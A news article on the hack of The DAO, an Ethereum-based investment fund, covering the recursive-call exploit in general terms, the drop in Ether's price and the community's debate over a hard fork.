The DAO, an Ethereum-based blockchain investment authority, is currently suffering a massive hack, akin to a bank robbery, in which a single individual has already siphoned off Ether worth over USD $43 million at current values. The hacker is taking advantage of the “recursive calling vulnerability,” a known issue in the DAO formula that the network’s leadership consciously decided did not pose a serious threat. The hack has sent Ethereum values plummeting, with the crypto currency’s price falling 10 percent to $17.68 within a matter of hours.
As of Friday morning, Gemini, the only government-approved exchange that currently trades in Ether, had not suspended trading, and users in Ethereum discussion forums were hotly debating whether the proposed “hard fork” constituted a power grab by the currency’s leaders.
The “recursive calling” vulnerability occurs when a user calls a split from the DAO to create a child DAO, and then calls a split recursively within the separate account to a third child DAO that they fully control. This process allows an attacker to siphon off an almost unlimited number of coins from the original DAO that contained more than $150 million in total value. The only good news is that the hacker won’t be able to actually transfer any of the coins into Bitcoin or cash for 27 days, giving the DAO community time to address the problem, if they can agree on how to do so.
Any fix though would require accessing the “child DAO” controlled by the attacker, which many in the community are loath to do, because technically the DAO belongs to the hacker. As some see it, the DAO’s trustworthiness lies in its rigidity. If the code allows for it, it’s legal and permissible. If the code does not allow for it, it cannot be done. So since the hacker was able to exploit the vulnerability, they didn’t technically break any rules.
“Isn’t the DAO working as designed? If a flaw was programmed in, then why should that be fixed unless it is a flaw in ethereum itself?” the top up-voted user on a Reddit thread discussing the hack wrote.
Ethereum itself is not under attack, only the DAO, which is a separate investment entity that works on the blockchain principles underlying Ether. Nonetheless, the DAO troubles seem to be impacting the price of Ethereum, as some of the currency’s value likely rests on the inherent possibilities of blockchain technologies like the DAO. If decentralized initiatives like the DAO continue to falter, as the young history suggests they might, few people may be willing to plow their money into even more ambitious schemes.
Current proposals to fix the problem have at least 27 days to pass before the hacker can walk away with whatever millions remain in the “child DAO” at that time. If the community cannot pull together to stop the attacker from skating away, it could lead to a mass sell-off in the DAO and a potential crash of Ethereum. Perhaps the best news for Ether-holders is that the hacker’s coins only have value as long as Ethereum itself is valuable. So even if they could crash the entire DAO, it may not behoove them to do so. But, of course, the internet is a strange place, and anything is possible.
Correction 7/14/17: A past version of this article incorrectly referred to Ethereum Foundation spokesperson George Hallam as a DAO developer.